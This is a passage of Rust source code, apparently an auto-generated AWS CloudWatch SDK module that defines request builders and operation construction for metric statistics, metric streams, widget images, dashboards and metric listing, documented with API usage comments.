#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
pub(crate) start_time: std::option::Option<smithy_types::Instant>,
pub(crate) end_time: std::option::Option<smithy_types::Instant>,
pub(crate) period: std::option::Option<i32>,
pub(crate) statistics: std::option::Option<std::vec::Vec<crate::model::Statistic>>,
pub(crate) extended_statistics: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) unit: std::option::Option<crate::model::StandardUnit>,
}
impl Builder {
/// <p>The namespace of the metric, with or without spaces.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The name of the metric, with or without spaces.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
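        /// Appends an item to `dimensions`.
        ///
        /// To override the contents of this collection use [`set_dimensions`](Self::set_dimensions).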
pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The time stamp that determines the first data point to return. Start times are
/// evaluated relative to the time that CloudWatch receives the request.</p>
/// <p>The value specified is inclusive; results include data points with the specified time stamp.
/// In a raw HTTP query, the time stamp must be in ISO 8601 UTC format (for example, 2016-10-03T23:00:00Z).</p>
/// <p>CloudWatch rounds the specified time stamp as follows:</p>
/// <ul>
/// <li>
/// <p>Start time less than 15 days ago - Round down to the nearest whole minute.
/// For example, 12:32:34 is rounded down to 12:32:00.</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Round down to the nearest 5-minute clock interval.
/// For example, 12:32:34 is rounded down to 12:30:00.</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Round down to the nearest 1-hour clock interval.
/// For example, 12:32:34 is rounded down to 12:00:00.</p>
/// </li>
/// </ul>
/// <p>If you set <code>Period</code> to 5, 10, or 30, the start time of your request is
/// rounded down to the nearest time that corresponds to even 5-, 10-, or 30-second divisions
/// of a minute. For example, if you make a query at (HH:mm:ss) 01:05:23 for the previous
/// 10-second period, the start time of your request is rounded down and you receive data from 01:05:10 to
/// 01:05:20. If you make a query at 15:07:17 for the previous 5 minutes of data, using a
/// period of 5 seconds, you receive data
/// timestamped between 15:02:15 and 15:07:15.
/// </p>
pub fn start_time(mut self, input: smithy_types::Instant) -> Self {
self.start_time = Some(input);
self
}
pub fn set_start_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.start_time = input;
self
}
/// <p>The time stamp that determines the last data point to return.</p>
/// <p>The value specified is exclusive; results include data points up to the specified time stamp.
/// In a raw HTTP query, the time stamp must be in ISO 8601 UTC format (for example, 2016-10-10T23:00:00Z).</p>
pub fn end_time(mut self, input: smithy_types::Instant) -> Self {
self.end_time = Some(input);
self
}
pub fn set_end_time(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.end_time = input;
self
}
/// <p>The granularity, in seconds, of the returned data points. For metrics with regular resolution, a period can
/// be as short as one minute (60 seconds) and must be a multiple of 60. For high-resolution metrics that are collected
/// at intervals of less than one minute, the period can be 1, 5, 10, 30, 60, or any multiple of 60. High-resolution metrics
/// are those metrics stored by a <code>PutMetricData</code> call that includes a <code>StorageResolution</code> of 1 second.</p>
        /// <p>If the <code>StartTime</code> parameter specifies a time stamp that is greater than
        /// 3 hours ago, you must specify the period as follows or no data points in that time range are returned:</p>
/// <ul>
/// <li>
/// <p>Start time between 3 hours and 15 days ago - Use a multiple of 60 seconds (1 minute).</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Use a multiple of 300 seconds (5 minutes).</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Use a multiple of 3600 seconds (1 hour).</p>
/// </li>
/// </ul>
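        /// <p>A hedged sketch, derived only from the rules above, of the smallest valid
        /// period for a given start-time age (the helper name is illustrative):</p>
        ///
        /// ```ignore
        /// fn minimum_period(start_age_secs: i64) -> i32 {
        ///     const HOUR: i64 = 3_600;
        ///     const DAY: i64 = 24 * HOUR;
        ///     match start_age_secs {
        ///         a if a > 63 * DAY => 3_600, // older than 63 days: 1-hour multiples
        ///         a if a > 15 * DAY => 300,   // 15 to 63 days: 5-minute multiples
        ///         a if a > 3 * HOUR => 60,    // 3 hours to 15 days: 1-minute multiples
        ///         _ => 1,                     // high-resolution range
        ///     }
        /// }
        /// ```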
pub fn period(mut self, input: i32) -> Self {
self.period = Some(input);
self
}
pub fn set_period(mut self, input: std::option::Option<i32>) -> Self {
self.period = input;
self
}
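        /// Appends an item to `statistics`.
        ///
        /// To override the contents of this collection use [`set_statistics`](Self::set_statistics).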
pub fn statistics(mut self, input: impl Into<crate::model::Statistic>) -> Self {
let mut v = self.statistics.unwrap_or_default();
v.push(input.into());
self.statistics = Some(v);
self
}
pub fn set_statistics(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Statistic>>,
) -> Self {
self.statistics = input;
self
}
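        /// Appends an item to `extended_statistics`.
        ///
        /// To override the contents of this collection use [`set_extended_statistics`](Self::set_extended_statistics).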
pub fn extended_statistics(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.extended_statistics.unwrap_or_default();
v.push(input.into());
self.extended_statistics = Some(v);
self
}
pub fn set_extended_statistics(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.extended_statistics = input;
self
}
/// <p>The unit for a given metric.
/// If you omit <code>Unit</code>, all data that was collected with any unit is returned, along with the corresponding units that were specified
/// when the data was reported to CloudWatch. If you specify a unit, the operation returns only data that was collected with that unit specified.
/// If you specify a unit that does not match the data collected, the results of the operation are null. CloudWatch does not perform unit conversions.</p>
pub fn unit(mut self, input: crate::model::StandardUnit) -> Self {
self.unit = Some(input);
self
}
pub fn set_unit(mut self, input: std::option::Option<crate::model::StandardUnit>) -> Self {
self.unit = input;
self
}
/// Consumes the builder and constructs a [`GetMetricStatisticsInput`](crate::input::GetMetricStatisticsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::GetMetricStatisticsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::GetMetricStatisticsInput {
namespace: self.namespace,
metric_name: self.metric_name,
dimensions: self.dimensions,
start_time: self.start_time,
end_time: self.end_time,
period: self.period,
statistics: self.statistics,
extended_statistics: self.extended_statistics,
unit: self.unit,
})
}
}
}
#[doc(hidden)]
pub type GetMetricStatisticsInputOperationOutputAlias = crate::operation::GetMetricStatistics;
#[doc(hidden)]
pub type GetMetricStatisticsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetMetricStatisticsInput {
/// Consumes the builder and constructs an Operation<[`GetMetricStatistics`](crate::operation::GetMetricStatistics)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetMetricStatistics,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_get_metric_statistics(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetMetricStatistics::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetMetricStatistics",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetMetricStatisticsInput`](crate::input::GetMetricStatisticsInput)
pub fn builder() -> crate::input::get_metric_statistics_input::Builder {
crate::input::get_metric_statistics_input::Builder::default()
}
}
/// See [`GetMetricStreamInput`](crate::input::GetMetricStreamInput)
pub mod get_metric_stream_input {
/// A builder for [`GetMetricStreamInput`](crate::input::GetMetricStreamInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) name: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the metric stream to retrieve information about.</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.name = Some(input.into());
self
}
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.name = input;
self
}
/// Consumes the builder and constructs a [`GetMetricStreamInput`](crate::input::GetMetricStreamInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::GetMetricStreamInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::GetMetricStreamInput { name: self.name })
}
}
}
#[doc(hidden)]
pub type GetMetricStreamInputOperationOutputAlias = crate::operation::GetMetricStream;
#[doc(hidden)]
pub type GetMetricStreamInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetMetricStreamInput {
/// Consumes the builder and constructs an Operation<[`GetMetricStream`](crate::operation::GetMetricStream)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetMetricStream,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_get_metric_stream(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetMetricStream::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetMetricStream",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetMetricStreamInput`](crate::input::GetMetricStreamInput)
pub fn builder() -> crate::input::get_metric_stream_input::Builder {
crate::input::get_metric_stream_input::Builder::default()
}
}
/// See [`GetMetricWidgetImageInput`](crate::input::GetMetricWidgetImageInput)
pub mod get_metric_widget_image_input {
/// A builder for [`GetMetricWidgetImageInput`](crate::input::GetMetricWidgetImageInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) metric_widget: std::option::Option<std::string::String>,
pub(crate) output_format: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>A JSON string that defines the bitmap graph to be retrieved. The string includes the
/// metrics to include in the graph, statistics, annotations, title, axis limits, and so on.
/// You can include only one <code>MetricWidget</code> parameter in each <code>GetMetricWidgetImage</code> call.</p>
/// <p>For more information about the syntax of <code>MetricWidget</code> see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/CloudWatch-Metric-Widget-Structure.html">GetMetricWidgetImage: Metric Widget Structure and Syntax</a>.</p>
/// <p>If any metric on the graph could not load all the requested data points, an orange triangle with an exclamation
/// point appears next to the graph legend.</p>
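        /// <p>A hedged sketch of a minimal widget definition; the field names follow the
        /// linked structure documentation, and the metric shown is only an example:</p>
        ///
        /// ```ignore
        /// let widget = r#"{"metrics":[["AWS/EC2","CPUUtilization"]],"width":600,"height":400}"#;
        /// let builder = builder.metric_widget(widget);
        /// ```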
pub fn metric_widget(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_widget = Some(input.into());
self
}
pub fn set_metric_widget(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.metric_widget = input;
self
}
/// <p>The format of the resulting image. Only PNG images are supported.</p>
/// <p>The default is <code>png</code>. If you specify <code>png</code>, the API returns an HTTP response with the
/// content-type set to <code>text/xml</code>. The image data is in a <code>MetricWidgetImage</code>
/// field. For example:</p>
        /// <p>
        /// <code>
        /// &lt;GetMetricWidgetImageResponse xmlns=&lt;URLstring&gt;&gt;</code>
        /// </p>
        /// <p>
        /// <code> &lt;GetMetricWidgetImageResult&gt;</code>
        /// </p>
        /// <p>
        /// <code> &lt;MetricWidgetImage&gt;</code>
        /// </p>
        /// <p>
        /// <code> iVBORw0KGgoAAAANSUhEUgAAAlgAAAGQEAYAAAAip...</code>
        /// </p>
        /// <p>
        /// <code> &lt;/MetricWidgetImage&gt;</code>
        /// </p>
        /// <p>
        /// <code> &lt;/GetMetricWidgetImageResult&gt;</code>
        /// </p>
        /// <p>
        /// <code> &lt;ResponseMetadata&gt;</code>
        /// </p>
        /// <p>
        /// <code> &lt;RequestId&gt;6f0d4192-4d42-11e8-82c1-f539a07e0e3b&lt;/RequestId&gt;</code>
        /// </p>
        /// <p>
        /// <code> &lt;/ResponseMetadata&gt;</code>
        /// </p>
        /// <p>
        /// <code>&lt;/GetMetricWidgetImageResponse&gt;</code>
        /// </p>
/// <p>The <code>image/png</code> setting is intended only for custom HTTP requests. For most
/// use cases, and all actions using an AWS SDK, you should use <code>png</code>. If you specify
/// <code>image/png</code>, the HTTP response has a content-type set to <code>image/png</code>,
/// and the body of the response is a PNG image. </p>
pub fn output_format(mut self, input: impl Into<std::string::String>) -> Self {
self.output_format = Some(input.into());
self
}
pub fn set_output_format(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.output_format = input;
self
}
/// Consumes the builder and constructs a [`GetMetricWidgetImageInput`](crate::input::GetMetricWidgetImageInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::GetMetricWidgetImageInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::GetMetricWidgetImageInput {
metric_widget: self.metric_widget,
output_format: self.output_format,
})
}
}
}
#[doc(hidden)]
pub type GetMetricWidgetImageInputOperationOutputAlias = crate::operation::GetMetricWidgetImage;
#[doc(hidden)]
pub type GetMetricWidgetImageInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl GetMetricWidgetImageInput {
/// Consumes the builder and constructs an Operation<[`GetMetricWidgetImage`](crate::operation::GetMetricWidgetImage)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::GetMetricWidgetImage,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_get_metric_widget_image(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::GetMetricWidgetImage::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"GetMetricWidgetImage",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`GetMetricWidgetImageInput`](crate::input::GetMetricWidgetImageInput)
pub fn builder() -> crate::input::get_metric_widget_image_input::Builder {
crate::input::get_metric_widget_image_input::Builder::default()
}
}
/// See [`ListDashboardsInput`](crate::input::ListDashboardsInput)
pub mod list_dashboards_input {
/// A builder for [`ListDashboardsInput`](crate::input::ListDashboardsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) dashboard_name_prefix: std::option::Option<std::string::String>,
pub(crate) next_token: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>If you specify this parameter, only
/// the dashboards with names starting with the specified string are listed. The maximum length is 255, and
/// valid characters are A-Z, a-z, 0-9, ".", "-", and "_".
/// </p>
pub fn dashboard_name_prefix(mut self, input: impl Into<std::string::String>) -> Self {
self.dashboard_name_prefix = Some(input.into());
self
}
pub fn set_dashboard_name_prefix(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.dashboard_name_prefix = input;
self
}
/// <p>The token returned by a previous call to indicate that there is more data available.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// Consumes the builder and constructs a [`ListDashboardsInput`](crate::input::ListDashboardsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::ListDashboardsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::ListDashboardsInput {
dashboard_name_prefix: self.dashboard_name_prefix,
next_token: self.next_token,
})
}
}
}
#[doc(hidden)]
pub type ListDashboardsInputOperationOutputAlias = crate::operation::ListDashboards;
#[doc(hidden)]
pub type ListDashboardsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl ListDashboardsInput {
/// Consumes the builder and constructs an Operation<[`ListDashboards`](crate::operation::ListDashboards)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::ListDashboards,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_list_dashboards(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::ListDashboards::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"ListDashboards",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`ListDashboardsInput`](crate::input::ListDashboardsInput)
pub fn builder() -> crate::input::list_dashboards_input::Builder {
crate::input::list_dashboards_input::Builder::default()
}
}
/// See [`ListMetricsInput`](crate::input::ListMetricsInput)
pub mod list_metrics_input {
/// A builder for [`ListMetricsInput`](crate::input::ListMetricsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::DimensionFilter>>,
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) recently_active: std::option::Option<crate::model::RecentlyActive>,
}
impl Builder {
        /// <p>The metric namespace to filter against. Only metrics in the namespace that matches
        /// exactly will be returned.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The name of the metric to filter against. Only the metrics with names that match exactly
/// will be returned.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
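        /// Appends an item to `dimensions`.
        ///
        /// To override the contents of this collection use [`set_dimensions`](Self::set_dimensions).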
pub fn dimensions(mut self, input: impl Into<crate::model::DimensionFilter>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::DimensionFilter>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// <p>To filter the results to show only metrics that have had data points published
/// in the past three hours, specify this parameter
/// with a value of <code>PT3H</code>. This is the only valid value
/// for this parameter.</p>
        /// <p>The results that are returned are an approximation of the value you specify. There
        /// is a low probability that the returned results include metrics whose last published
        /// data point is as much as 40 minutes older than the specified time interval allows.</p>
pub fn recently_active(mut self, input: crate::model::RecentlyActive) -> Self {
self.recently_active = Some(input);
self
}
pub fn set_recently_active(
mut self,
input: std::option::Option<crate::model::RecentlyActive>,
) -> Self {
self.recently_active = input;
self
}
/// Consumes the builder and constructs a [`ListMetricsInput`](crate::input::ListMetricsInput)
pub fn build(
self,
) -> std::result::Result<crate::input::ListMetricsInput, smithy_http::operation::BuildError>
{
Ok(crate::input::ListMetricsInput {
namespace: self.namespace,
metric_name: self.metric_name,
dimensions: self.dimensions,
next_token: self.next_token,
recently_active: self.recently_active,
})
}
}
}
#[doc(hidden)]
pub type ListMetricsInputOperationOutputAlias = crate::operation::ListMetrics;
#[doc(hidden)]
pub type ListMetricsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl ListMetricsInput {
/// Consumes the builder and constructs an Operation<[`ListMetrics`](crate::operation::ListMetrics)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::ListMetrics,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_list_metrics(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::ListMetrics::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"ListMetrics",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`ListMetricsInput`](crate::input::ListMetricsInput)
pub fn builder() -> crate::input::list_metrics_input::Builder {
crate::input::list_metrics_input::Builder::default()
}
}
/// See [`ListMetricStreamsInput`](crate::input::ListMetricStreamsInput)
pub mod list_metric_streams_input {
